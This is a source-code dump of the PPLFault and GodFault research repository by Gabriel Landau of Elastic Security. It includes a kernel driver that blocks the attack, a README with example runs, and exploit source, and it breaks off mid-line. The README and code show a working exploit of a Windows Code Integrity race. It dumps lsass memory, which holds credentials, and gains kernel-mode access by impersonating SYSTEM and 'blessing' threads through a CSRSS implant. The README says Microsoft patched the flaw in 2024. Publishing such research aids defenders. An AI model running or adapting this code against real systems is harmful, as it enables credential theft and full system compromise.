| PlugPlayControlStartDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 86 | PlugPlayControlUnlockDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 87 | PlugPlayControlQueryAndRemoveDevice, // PLUGPLAY_CONTROL_QUERY_AND_REMOVE_DATA 88 | PlugPlayControlUserResponse, // PLUGPLAY_CONTROL_USER_RESPONSE_DATA 89 | PlugPlayControlGenerateLegacyDevice, // PLUGPLAY_CONTROL_LEGACY_DEVGEN_DATA 90 | PlugPlayControlGetInterfaceDeviceList, // PLUGPLAY_CONTROL_INTERFACE_LIST_DATA 91 | PlugPlayControlProperty, // PLUGPLAY_CONTROL_PROPERTY_DATA 92 | PlugPlayControlDeviceClassAssociation, // PLUGPLAY_CONTROL_CLASS_ASSOCIATION_DATA 93 | PlugPlayControlGetRelatedDevice, // PLUGPLAY_CONTROL_RELATED_DEVICE_DATA 94 | PlugPlayControlGetInterfaceDeviceAlias, // PLUGPLAY_CONTROL_INTERFACE_ALIAS_DATA 95 | PlugPlayControlDeviceStatus, // PLUGPLAY_CONTROL_STATUS_DATA 96 | PlugPlayControlGetDeviceDepth, // PLUGPLAY_CONTROL_DEPTH_DATA 97 | PlugPlayControlQueryDeviceRelations, // PLUGPLAY_CONTROL_DEVICE_RELATIONS_DATA 98 | PlugPlayControlTargetDeviceRelation, // PLUGPLAY_CONTROL_TARGET_RELATION_DATA 99 | PlugPlayControlQueryConflictList, // PLUGPLAY_CONTROL_CONFLICT_LIST 100 | PlugPlayControlRetrieveDock, // PLUGPLAY_CONTROL_RETRIEVE_DOCK_DATA 101 | PlugPlayControlResetDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 102 | PlugPlayControlHaltDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 103 | PlugPlayControlGetBlockedDriverList, // PLUGPLAY_CONTROL_BLOCKED_DRIVER_DATA 104 | PlugPlayControlGetDeviceInterfaceEnabled, // PLUGPLAY_CONTROL_DEVICE_INTERFACE_ENABLED 105 | MaxPlugPlayControl 106 | } PLUGPLAY_CONTROL_CLASS, *PPLUGPLAY_CONTROL_CLASS; 107 | 108 | #if (PHNT_VERSION < PHNT_WIN8) 109 | NTSYSCALLAPI 110 | NTSTATUS 111 | NTAPI 112 | NtGetPlugPlayEvent( 113 | _In_ HANDLE EventHandle, 114 | _In_opt_ PVOID Context, 115 | _Out_writes_bytes_(EventBufferSize) PPLUGPLAY_EVENT_BLOCK EventBlock, 116 | _In_ ULONG EventBufferSize 117 | ); 118 | #endif 119 | 120 | NTSYSCALLAPI 121 | NTSTATUS 122 | NTAPI 123 | NtPlugPlayControl( 124 | _In_ PLUGPLAY_CONTROL_CLASS PnPControlClass, 125 | _Inout_updates_bytes_(PnPControlDataLength) PVOID PnPControlData, 126 | _In_ ULONG PnPControlDataLength 127 | ); 128 | 129 | #if (PHNT_VERSION >= PHNT_WIN7) 130 | 131 | NTSYSCALLAPI 132 | NTSTATUS 133 | NTAPI 134 | NtSerializeBoot( 135 | VOID 136 | ); 137 | 138 | NTSYSCALLAPI 139 | NTSTATUS 140 | NTAPI 141 | NtEnableLastKnownGood( 142 | VOID 143 | ); 144 | 145 | NTSYSCALLAPI 146 | NTSTATUS 147 | NTAPI 148 | NtDisableLastKnownGood( 149 | VOID 150 | ); 151 | 152 | #endif 153 | 154 | #if (PHNT_VERSION >= PHNT_VISTA) 155 | NTSYSCALLAPI 156 | NTSTATUS 157 | NTAPI 158 | NtReplacePartitionUnit( 159 | _In_ PUNICODE_STRING TargetInstancePath, 160 | _In_ PUNICODE_STRING SpareInstancePath, 161 | _In_ ULONG Flags 162 | ); 163 | #endif 164 | 165 | #endif 166 | -------------------------------------------------------------------------------- /NoFault/NoFault.cpp: -------------------------------------------------------------------------------- 1 | #include "NoFault.h" 2 | 3 | // Define _ALLOW_UNLOAD if you want to allow this driver to be unloaded 4 | // This allows malware to unload this driver and exploit previously-protected systems 5 | // If unloads are not allowed, the system must be rebooted to remove the protection provided by this driver 6 | #ifdef _DEBUG 7 | #define _ALLOW_UNLOAD 8 | #else 9 | #define _ALLOW_UNLOAD 10 | #endif // _DEBUG 11 | 12 | 13 | 14 | // Applies BlockRemoteImageLoads mitigation to the given process 15 | NTSTATUS HardenProcess(PEPROCESS pProcess, HANDLE hProcess) 16 | { 17 | NTSTATUS ntStatus = STATUS_SUCCESS; 18 | PROCESS_MITIGATION_POLICY_INFORMATION policy; 19 | KAPC_STATE apcState = { 0, }; 20 | 21 | RtlZeroMemory(&policy, sizeof(policy)); 22 | 23 | // First pull existing policy 24 | policy.Policy = ProcessImageLoadPolicy; 25 | ntStatus = ZwQueryInformationProcess(hProcess, ProcessMitigationPolicy, &policy, sizeof(policy), NULL); 26 | if (!NT_SUCCESS(ntStatus)) 27 | { 28 | goto Cleanup; 29 | } 30 | 31 | // The attack uses the SMB redirector 32 | policy.ImageLoadPolicy.NoRemoteImages = TRUE; 33 | 34 | // ZwSetInformationProcess(ProcessMitigationPolicy) requires ZwCurrentProcess(), so briefly jump into the remote process 35 | KeStackAttachProcess(pProcess, &apcState); 36 | { 37 | ntStatus = ZwSetInformationProcess(ZwCurrentProcess(), ProcessMitigationPolicy, &policy, sizeof(policy)); 38 | } 39 | KeUnstackDetachProcess(&apcState); 40 | 41 | Cleanup: 42 | return ntStatus; 43 | } 44 | 45 | // Is the current process *-Full or WinTcb-Light? 46 | BOOLEAN IsCurrentProcessFullPPOrWinTcbLight() 47 | { 48 | NTSTATUS ntStatus = STATUS_SUCCESS; 49 | BOOLEAN bResult = FALSE; 50 | PS_PROTECTION protection = { 0, }; 51 | 52 | ntStatus = ZwQueryInformationProcess(ZwCurrentProcess(), ProcessProtectionInformation, &protection, sizeof(protection), NULL); 53 | if (!NT_SUCCESS(ntStatus)) 54 | { 55 | goto Cleanup; 56 | } 57 | 58 | // Full Protected Processes 59 | if (PsProtectedTypeProtected == protection.Type) 60 | { 61 | bResult = TRUE; 62 | goto Cleanup; 63 | } 64 | 65 | // WinTcb-Light 66 | if ((PsProtectedTypeProtectedLight == protection.Type) && 67 | (PsProtectedSignerWinTcb == protection.Signer)) 68 | { 69 | bResult = TRUE; 70 | goto Cleanup; 71 | } 72 | 73 | Cleanup: 74 | return bResult; 75 | } 76 | 77 | // Returns whether the given process should have the BlockRemoteImageLoads mitigation policy applied 78 | BOOLEAN ShouldHardenProcess(HANDLE hProcess) 79 | { 80 | BOOLEAN bResult = FALSE; 81 | NTSTATUS ntStatus = STATUS_SUCCESS; 82 | PS_PROTECTION protection = { 0, }; 83 | 84 | // Do not interfere with actions taken by core Windows processes 85 | if (IsCurrentProcessFullPPOrWinTcbLight()) 86 | { 87 | goto Cleanup; 88 | } 89 | 90 | // Determine protection status 91 | ntStatus = ZwQueryInformationProcess(hProcess, ProcessProtectionInformation, &protection, sizeof(protection), NULL); 92 | if (!NT_SUCCESS(ntStatus)) 93 | { 94 | goto Cleanup; 95 | } 96 | 97 | // Only applies to PPL. I could not reproduce this on PP. 98 | if (PsProtectedTypeProtectedLight != protection.Type) 99 | { 100 | goto Cleanup; 101 | } 102 | 103 | switch (protection.Signer) 104 | { 105 | case PsProtectedSignerCodeGen: 106 | case PsProtectedSignerLsa: 107 | case PsProtectedSignerWindows: 108 | case PsProtectedSignerWinTcb: 109 | case PsProtectedSignerWinSystem: 110 | case PsProtectedSignerAntimalware: 111 | // Note: Applying this to PsProtectedSignerAntimalware is debatable 112 | // External vendors can run code as PsProtectedSignerAntimalware-Light, so enabling this here risks breaking their software 113 | // We could enable it by default, and allow them to opt-out via SetProcessMitigationPolicy 114 | bResult = TRUE; 115 | default: 116 | break; 117 | } 118 | 119 | Cleanup: 120 | return bResult; 121 | } 122 | 123 | void CreateProcessNotifyRoutine( 124 | PEPROCESS pProcess, 125 | HANDLE ProcessId, 126 | PPS_CREATE_NOTIFY_INFO CreateInfo 127 | ) 128 | { 129 | HANDLE hProcess = NULL; 130 | NTSTATUS ntStatus = STATUS_SUCCESS; 131 | 132 | UNREFERENCED_PARAMETER(ProcessId); 133 | 134 | if (!CreateInfo) 135 | { 136 | // Process termination 137 | goto Cleanup; 138 | } 139 | 140 | // PEPROCESS -> HANDLE 141 | ntStatus = ObOpenObjectByPointer(pProcess, OBJ_KERNEL_HANDLE, NULL, PROCESS_ALL_ACCESS, *PsProcessType, KernelMode, &hProcess); 142 | if (!NT_SUCCESS(ntStatus)) 143 | { 144 | goto Cleanup; 145 | } 146 | 147 | if (ShouldHardenProcess(hProcess)) 148 | { 149 | (void)HardenProcess(pProcess, hProcess); 150 | } 151 | 152 | Cleanup: 153 | if (hProcess) 154 | { 155 | ZwClose(hProcess); 156 | } 157 | 158 | return; 159 | } 160 | 161 | void 162 | DriverUnload( 163 | IN PDRIVER_OBJECT DriverObject) 164 | { 165 | UNREFERENCED_PARAMETER(DriverObject); 166 | 167 | (void)PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, TRUE); 168 | } 169 | 170 | EXTERN_C 171 | NTSTATUS DriverEntry( 172 | _In_ PDRIVER_OBJECT DriverObject, 173 | _In_ PUNICODE_STRING RegistryPath 174 | ) 175 | { 176 | NTSTATUS ntStatus = STATUS_SUCCESS; 177 | 178 | UNREFERENCED_PARAMETER(DriverObject); 179 | UNREFERENCED_PARAMETER(RegistryPath); 180 | 181 | ntStatus = PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, FALSE); 182 | 183 | #ifdef _ALLOW_UNLOAD 184 | DriverObject->DriverUnload = DriverUnload; 185 | #endif // _ALLOW_UNLOAD 186 | 187 | return ntStatus; 188 | } 189 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PPLFault 2 | 3 | By [Gabriel Landau](https://twitter.com/GabrielLandau) at [Elastic Security](https://www.elastic.co/security-labs/). 4 | 5 | From [PPLdump Is Dead. Long Live PPLdump!](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052) presented at [Black Hat Asia 2023](https://www.blackhat.com/asia-23). 6 | 7 | [![PPLdump Is Dead. Long Live PPLdump!](http://img.youtube.com/vi/5xteW8Tm410/0.jpg)](http://www.youtube.com/watch?v=5xteW8Tm410 "PPLdump Is Dead. Long Live PPLdump!") 8 | 9 | ## PPLFault 10 | 11 | **2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13. See [this thread](https://x.com/GabrielLandau/status/1757818200127946922?s=20) for related discussion.** 12 | 13 | Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process. For more details on the exploit, see my [slides](http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf) and/or [talk](https://x.com/GabrielLandau/status/1707773387731272085). 14 | 15 | ### Example Output 16 | 17 | ``` 18 | PS C:\Users\user\Desktop> cmd /c ver 19 | 20 | Microsoft Windows [Version 10.0.25346.1001] 21 | PS C:\Users\user\Desktop> tasklist | findstr lsass 22 | lsass.exe 992 Services 0 76,620 K 23 | PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection 24 | 25 | Type Signer 26 | ---- ------ 27 | ProtectedLight Lsa 28 | 29 | 30 | PS C:\Users\user\Desktop> dir *.dmp 31 | PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp 32 | [+] No cleanup necessary. Backup does not exist. 33 | [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint 34 | [+] Benign: C:\Windows\System32\EventAggregation.dll.bak 35 | [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll 36 | [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll 37 | [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll 38 | [+] Ready. Spawning WinTcb. 39 | [+] SpawnPPL: Waiting for child process to finish. 40 | [+] FetchDataCallback called. 41 | [+] Hydrating 90112 bytes at offset 0 42 | [+] Switching to payload 43 | [+] Emptying system working set 44 | [+] Working set purged 45 | [+] Give the memory manager a moment to think 46 | [+] Hydrating 90112 PAYLOAD bytes at offset 0 47 | [+] Dump saved to: lsass.dmp 48 | [+] Dump is 74.9 MB 49 | [+] Operation took 937 ms 50 | PS C:\Users\user\Desktop> dir *.dmp 51 | 52 | 53 | Directory: C:\Users\user\Desktop 54 | 55 | 56 | Mode LastWriteTime Length Name 57 | ---- ------------- ------ ---- 58 | -a---- 5/1/2023 11:18 AM 78581973 lsass.dmp 59 | ``` 60 | 61 | ## GodFault 62 | 63 | Exploits the same TOCTOU as PPLFault. However instead of dumping a process, it migrates to CSRSS and exploits a vulnerability in `win32k!NtUserHardErrorControlCall` from [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L69-L81) to decrement `KTHREAD.PreviousMode` from `UserMode` (1) to `KernelMode` (0). It proves "God Mode" access by opening `\Device\PhysicalMemory`, normally inaccessible from `UserMode`, as `SECTION_ALL_ACCESS`. 64 | 65 | ### Example Output 66 | 67 | ``` 68 | C:\Users\user\Desktop>GodFault.exe -v 69 | [?] Server does not appear to be running. Attempting to install it... 70 | [+] No cleanup necessary. Backup does not exist. 71 | [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint 72 | [+] CSRSS PID is 772 73 | [+] Benign: C:\Windows\System32\EventAggregation.dll.bak 74 | [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll 75 | [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll 76 | [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll 77 | [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure 78 | [+] Ready. Spawning WinTcb. 79 | [+] SpawnPPL: Waiting for child process to finish. 80 | [+] FetchDataCallback called. 81 | [+] Hydrating 90112 bytes at offset 0 82 | [+] Switching to payload 83 | [+] Emptying system working set 84 | [+] Working set purged 85 | [+] Give the memory manager a moment to think 86 | [+] Hydrating 90112 PAYLOAD bytes at offset 0 87 | [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed 88 | [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success 89 | [+] Opened \Device\PhysicalMemory. Handle is 0x1b4 90 | [+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x1c0 91 | [+] Press any key to continue... 92 | [+] No cleanup necessary. Backup does not exist. 93 | ``` 94 | 95 | ## Python 96 | PoC that achieves arbitrary code execution as WinTcb-Light without the CloudFilter API. See [python/README.md](python/README.md). 97 | 98 | ## Tested Platforms 99 | 100 | | | Windows 11 22H2 22621.1702 (May 2023) | Windows 11 Insider Canary 25346.1001 (April 2023) | 101 | | - | - | - | 102 | | PPLFault | ✔️ | ✔️ | 103 | | GodFault | ✔️ | ❌ Insider PreviousMode mitigation [bugchecks](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) | 104 | 105 | # License 106 | 107 | PPLFault is covered by the [ELv2 license](LICENSE.txt). It uses [phnt](https://github.com/winsiderss/systeminformer/tree/25846070780183848dc8d8f335a54fa6e636e281/phnt) from SystemInformer under the [MIT license](phnt/LICENSE.txt). 108 | 109 | # Credits 110 | Inspired by [PPLdump](https://github.com/itm4n/PPLdump) by [Clément Labro](https://infosec.exchange/@itm4n), which Microsoft [patched](https://itm4n.github.io/the-end-of-ppldump/) in July 2022. 111 | 112 | [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD) was created by [Austin Hudson](https://twitter.com/ilove2pwn_), who released it when Microsoft patched PPLdump. 113 | -------------------------------------------------------------------------------- /GodFault/IPC.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "Payload.h" 6 | #include "GMShellcode.h" 7 | #include "resource.h" 8 | #include "Logging.h" 9 | #include 10 | #include 11 | #include 12 | #include 13 | 14 | // Locates the KTHREAD for the given thread ID 15 | // Note that this returns a kernel address 16 | PVOID FindKTHREAD(DWORD dwThreadId) 17 | { 18 | NTSTATUS ntStatus = NULL; 19 | PVOID pThread = NULL; 20 | PSYSTEM_HANDLE_INFORMATION pInfo = NULL; 21 | std::string buf; 22 | 23 | // Create a handle to the thread 24 | HANDLE hThread = OpenThread(SYNCHRONIZE, FALSE, dwThreadId); 25 | if (!hThread) 26 | { 27 | Log(Error, "Failed to open my own thread?!?"); 28 | goto Cleanup; 29 | } 30 | 31 | // Get a list of all handles on the system 32 | do 33 | { 34 | buf.resize(buf.empty() ? (1024 * 1024) : (buf.size() * 2)); 35 | ntStatus = NtQuerySystemInformation(SystemHandleInformation, &buf[0], (ULONG)buf.size(), NULL); 36 | } while (STATUS_INFO_LENGTH_MISMATCH == ntStatus); 37 | 38 | if (!NT_SUCCESS(ntStatus)) 39 | { 40 | Log(Error, "NtQuerySystemInformation(SystemHandleInformation) failed with NTSTATUS 0x%08x", ntStatus); 41 | goto Cleanup; 42 | } 43 | 44 | pInfo = (PSYSTEM_HANDLE_INFORMATION)&buf[0]; 45 | for (ULONG i = 0; i < pInfo->NumberOfHandles; i++) 46 | { 47 | const SYSTEM_HANDLE_TABLE_ENTRY_INFO& info = pInfo->Handles[i]; 48 | 49 | // Find the entry that corresponds to the the handle we created above 50 | // It will have our PID, and the same handle value 51 | if ((GetCurrentProcessId() == info.UniqueProcessId) && ((USHORT)(ULONG_PTR)hThread == info.HandleValue)) 52 | { 53 | // Return the pointer 54 | pThread = info.Object; 55 | goto Cleanup; 56 | } 57 | } 58 | 59 | Cleanup: 60 | CloseHandle(hThread); 61 | return pThread; 62 | } 63 | 64 | // Impersonate CSRSS, which runs as SYSTEM 65 | bool GetSystem() 66 | { 67 | bool bResult = false; 68 | HANDLE hToken = NULL; 69 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 70 | CsrGetProcessId_t pCsrGetProcessId = (CsrGetProcessId_t)GetProcAddress(hNtdll, "CsrGetProcessId"); 71 | HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pCsrGetProcessId()); 72 | 73 | if (hProcess && OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) 74 | { 75 | bResult = ImpersonateLoggedOnUser(hToken); 76 | CloseHandle(hToken); 77 | } 78 | else 79 | { 80 | Log(Error, "Failed to open CSRSS's token"); 81 | } 82 | 83 | CloseHandle(hProcess); 84 | return bResult; 85 | } 86 | 87 | // Ask our CSRSS implant to set the given thread's PreviousMode to KernelMode using ANGRYORCHARD 88 | bool BlessThread(DWORD dwThreadId, bool bFatal) 89 | { 90 | bool bResult = false; 91 | HANDLE hMutex = NULL; 92 | HANDLE hReq = NULL; 93 | HANDLE hDone = NULL; 94 | HANDLE hSection = NULL; 95 | PVOID pThread = NULL; 96 | PIPC_SECTION pSection = NULL; 97 | bool bMustReleaseMutex = false; 98 | 99 | if (0 == dwThreadId) 100 | { 101 | goto Cleanup; 102 | } 103 | 104 | pThread = FindKTHREAD(dwThreadId); 105 | if (!pThread) 106 | { 107 | Log(Error, "Failed to find thread %u"); 108 | goto Cleanup; 109 | } 110 | 111 | // Get SYSTEM in case we're only Admin 112 | if (!GetSystem()) 113 | { 114 | Log(Warning, "Failed to impersonate SYSTEM. This may break IPC if you're not already running as SYSTEM."); 115 | } 116 | 117 | hMutex = OpenMutexW(SYNCHRONIZE, FALSE, GLOBAL MUTEX_NAME_BASE); 118 | hReq = OpenEventW(EVENT_MODIFY_STATE, FALSE, GLOBAL REQ_NAME_BASE); 119 | hDone = OpenEventW(SYNCHRONIZE, FALSE, GLOBAL DONE_NAME_BASE); 120 | hSection = OpenFileMappingW(FILE_MAP_WRITE, FALSE, GLOBAL SECTION_NAME_BASE); 121 | 122 | if (!hMutex || !hReq || !hDone || !hSection) 123 | { 124 | if (bFatal) 125 | { 126 | Log(Error, "Server does not appear to be running."); 127 | } 128 | else 129 | { 130 | Log(Warning, "Server does not appear to be running. Attempting to install it..."); 131 | } 132 | goto Cleanup; 133 | } 134 | 135 | pSection = (PIPC_SECTION)MapViewOfFile(hSection, FILE_MAP_WRITE, 0, 0, 4096); 136 | if (!pSection) 137 | { 138 | Log(Error, "Failed to map IPC section."); 139 | goto Cleanup; 140 | } 141 | 142 | if (WAIT_OBJECT_0 != WaitForSingleObject(hMutex, 1000)) 143 | { 144 | Log(Error, "Failed to acquire mutex."); 145 | goto Cleanup; 146 | } 147 | bMustReleaseMutex = true; 148 | 149 | // Send request 150 | pSection->pThread = pThread; 151 | pSection->ntStatus = STATUS_UNSUCCESSFUL; 152 | FlushViewOfFile(pSection, sizeof(*pSection)); 153 | SetEvent(hReq); 154 | 155 | // Wait for ACK 156 | WaitForSingleObject(hDone, 1000); 157 | 158 | if (!NT_SUCCESS(pSection->ntStatus)) 159 | { 160 | Log(Error, "Bless IPC failed with NTSTATUS 0x%08x.", pSection->ntStatus); 161 | goto Cleanup; 162 | } 163 | 164 | Log(Info, "Thread %u (KTHREAD %p) has been blessed by GodFault", dwThreadId, pThread); 165 | bResult = true; 166 | 167 | Cleanup: 168 | if (bMustReleaseMutex) ReleaseMutex(hMutex); 169 | if (pSection) UnmapViewOfFile(pSection); 170 | if (hMutex) CloseHandle(hMutex); 171 | if (hReq) CloseHandle(hReq); 172 | if (hDone) CloseHandle(hDone); 173 | if (hSection) CloseHandle(hSection); 174 | 175 | RevertToSelf(); 176 | 177 | return bResult; 178 | } 179 | -------------------------------------------------------------------------------- /GodFault/GodFault.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {3c206b0d-0725-4d6d-8047-bbcc6d260410} 17 | GodFault 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | false 27 | 28 | 29 | Application 30 | false 31 | v142 32 | true 33 | Unicode 34 | false 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | true 50 | 51 | 52 | false 53 | 54 | 55 | 56 | Level3 57 | true 58 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 59 | true 60 | $(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\GMShellcode;%(AdditionalIncludeDirectories) 61 | 62 | 63 | Console 64 | true 65 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 66 | 67 | 68 | 69 | 70 | Level3 71 | true 72 | true 73 | true 74 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 75 | true 76 | MultiThreaded 77 | $(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\GMShellcode;%(AdditionalIncludeDirectories) 78 | 79 | 80 | Console 81 | true 82 | true 83 | true 84 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | _DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions) 101 | 102 | 103 | 104 | 105 | 106 | -------------------------------------------------------------------------------- /PPLFault/PPLFault.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {b2e27b81-83d9-47c6-a27e-94a79d0234d7} 17 | PPLFaultGM 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | false 27 | 28 | 29 | Application 30 | false 31 | v142 32 | true 33 | Unicode 34 | false 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | true 50 | 51 | 52 | false 53 | 54 | 55 | 56 | Level3 57 | true 58 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 59 | true 60 | $(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\DumpShellcode;%(AdditionalIncludeDirectories) 61 | 62 | 63 | Console 64 | true 65 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 66 | 67 | 68 | 69 | 70 | Level3 71 | true 72 | true 73 | true 74 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 75 | true 76 | MultiThreaded 77 | $(SolutionDir)\Utils;$(SolutionDir)/phnt/include;$(SolutionDir)\DumpShellcode;%(AdditionalIncludeDirectories) 78 | 79 | 80 | Console 81 | true 82 | true 83 | true 84 | $(OutDir)/Utils.lib;shlwapi.lib;dbghelp.lib;ntdll.lib;Pathcch.lib;CldApi.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | _DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions) 101 | 102 | 103 | 104 | 105 | 106 | -------------------------------------------------------------------------------- /GodFault/Payload.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "Payload.h" 6 | #include "GMShellcode.h" 7 | #include "resource.h" 8 | #include "Logging.h" 9 | #include "PayloadUtils.h" 10 | #include 11 | #include 12 | #include 13 | 14 | bool InitShellcodeParams( 15 | PSHELLCODE_PARAMS pParams 16 | ) 17 | { 18 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 19 | HMODULE hWin32U = LoadLibraryW(L"win32u.dll"); 20 | CsrGetProcessId_t pCsrGetProcessId = NULL; 21 | uint8_t nops[MAGIC_NOPS_LENGTH] = MAGIC_NOPS; 22 | 23 | ZeroMemory(pParams, sizeof(*pParams)); 24 | 25 | pParams->magic1 = MAGIC1; 26 | pParams->magic2 = MAGIC2; 27 | 28 | memcpy(pParams->magicNops, nops, sizeof(nops)); 29 | 30 | wcsncpy(pParams->mutexName, BNO MUTEX_NAME_BASE, _countof(pParams->mutexName)); 31 | wcsncpy(pParams->reqName, BNO REQ_NAME_BASE, _countof(pParams->reqName)); 32 | wcsncpy(pParams->doneName, BNO DONE_NAME_BASE, _countof(pParams->doneName)); 33 | wcsncpy(pParams->sectionName, BNO SECTION_NAME_BASE, _countof(pParams->sectionName)); 34 | 35 | // IAT 36 | if (!hNtdll || !hWin32U) 37 | { 38 | Log(Error, "Couldn't find kernel32/win32u? What?"); 39 | return false; 40 | } 41 | 42 | pCsrGetProcessId = (CsrGetProcessId_t)GetProcAddress(hNtdll, "CsrGetProcessId"); 43 | if (!pCsrGetProcessId) 44 | { 45 | Log(Error, "Failed to resolve CsrGetProcessId"); 46 | return false; 47 | } 48 | pParams->dwCsrssPid = pCsrGetProcessId(); 49 | //pParams->pThreadObject = FindKTHREAD(dwThreadId); 50 | 51 | Log(Info, "CSRSS PID is %u", pParams->dwCsrssPid); 52 | //Log(Info, "Elevate TID is %u. KTHREAD is at %p", dwThreadId, pParams->pThreadObject); 53 | 54 | #define REQUIRE_IMPORT(p) if (!(p)) { goto IMPORT_FAILURE; } 55 | 56 | // Target process should already have ntdll and win32u loaded, so we can just pass pointers over 57 | 58 | // ntdll 59 | REQUIRE_IMPORT(pParams->pNtOpenProcess = (NtOpenProcess_t)GetProcAddress(hNtdll, "NtOpenProcess")); 60 | REQUIRE_IMPORT(pParams->pNtTerminateProcess = (NtTerminateProcess_t)GetProcAddress(hNtdll, "NtTerminateProcess")); 61 | REQUIRE_IMPORT(pParams->pRtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege")); 62 | REQUIRE_IMPORT(pParams->pNtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory")); 63 | REQUIRE_IMPORT(pParams->pNtWriteVirtualMemory = (NtWriteVirtualMemory_t)GetProcAddress(hNtdll, "NtWriteVirtualMemory")); 64 | REQUIRE_IMPORT(pParams->pRtlCreateUserThread = (RtlCreateUserThread_t)GetProcAddress(hNtdll, "RtlCreateUserThread")); 65 | REQUIRE_IMPORT(pParams->pNtWaitForSingleObject = (NtWaitForSingleObject_t)GetProcAddress(hNtdll, "NtWaitForSingleObject")); 66 | REQUIRE_IMPORT(pParams->pNtCreateMutant = (NtCreateMutant_t)GetProcAddress(hNtdll, "NtCreateMutant")); 67 | REQUIRE_IMPORT(pParams->pNtCreateEvent = (NtCreateEvent_t)GetProcAddress(hNtdll, "NtCreateEvent")); 68 | REQUIRE_IMPORT(pParams->pNtSetEvent = 